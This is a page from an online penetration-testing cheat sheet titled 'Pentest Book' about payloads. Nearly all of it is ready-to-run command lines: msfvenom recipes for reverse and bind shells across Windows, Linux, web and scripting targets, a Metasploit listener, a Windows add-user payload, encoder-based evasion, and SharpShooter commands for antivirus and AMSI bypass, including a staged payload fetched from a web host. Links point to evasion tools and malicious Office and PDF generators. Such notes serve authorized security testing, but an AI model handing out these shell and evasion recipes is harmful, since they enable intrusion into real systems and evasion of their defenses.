Pentest Book
Search…
Payloads

msfvenom

1
# Creating a payload
2
msfvenom -p [payload] LHOST=[listeninghost] LPORT=[listeningport]
3
4
# List of payloads
5
msfvenom -l payloads
6
7
# Payload options
8
msfvenom -p windows/x64/meterpreter_reverse_tcp --list-options
9
10
# Creating a payload with encoding
11
msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration] > outputfile
12
13
# Creating a payload using a template
14
msfvenom -p [payload] -x [template] -f [formattype] > outputfile
15
16
# Listener for MSfvenom Payloads:
17
msf5>use exploit/multi/handler
18
msf5>set payload windows/meterpreter/reverse_tcp
19
msf5>set lhost
20
msf5>set lport
21
msf5> set ExitOnSession false
22
msf5>exploit -j
23
24
# Windows Payloads
25
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
26
msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe
27
msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe
28
msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
29
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
30
31
# Linux Payloads
32
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
33
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
34
msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
35
msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
36
37
# Add a user in windows with msfvenom:
38
msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe
39
40
# Web Payloads
41
42
# PHP
43
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
44
cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php
45
46
# ASP
47
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
48
49
# JSP
50
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
51
52
# WAR
53
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
54
55
# Scripting Payloads
56
57
# Python
58
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
59
60
# Bash
61
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
62
63
# Perl
64
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
65
66
# Creating an Msfvenom Payload with an encoder while removing bad charecters:
67
msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b "\x0A\x0D"
68
69
https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/
Copied!

Bypass AV

1
# Veil Framework:
2
https://github.com/Veil-Framework/Veil
3
4
# Shellter
5
https://www.shellterproject.com/download/
6
7
# Sharpshooter
8
# https://github.com/mdsecactivebreach/SharpShooter
9
# Javascript Payload Stageless:
10
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
11
12
# Stageless HTA Payload:
13
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee
14
15
# Staged VBS:
16
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
17
18
# Donut:
19
https://github.com/TheWover/donut
20
21
# Vulcan
22
https://github.com/praetorian-code/vulcan
Copied!

Bypass Amsi

1
# Testing for Amsi Bypass:
2
https://github.com/rasta-mouse/AmsiScanBufferBypass
3
4
# Amsi-Bypass-Powershell
5
https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
6
7
https://blog.f-secure.com/hunting-for-amsi-bypasses/
8
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
9
https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
10
https://slaeryan.github.io/posts/falcon-zero-alpha.html
Copied!

Office Docs

1
https://github.com/thelinuxchoice/eviloffice
2
https://github.com/thelinuxchoice/evilpdf
Copied!
Last modified 1yr ago
Export as PDF
Copy link
Edit on GitHub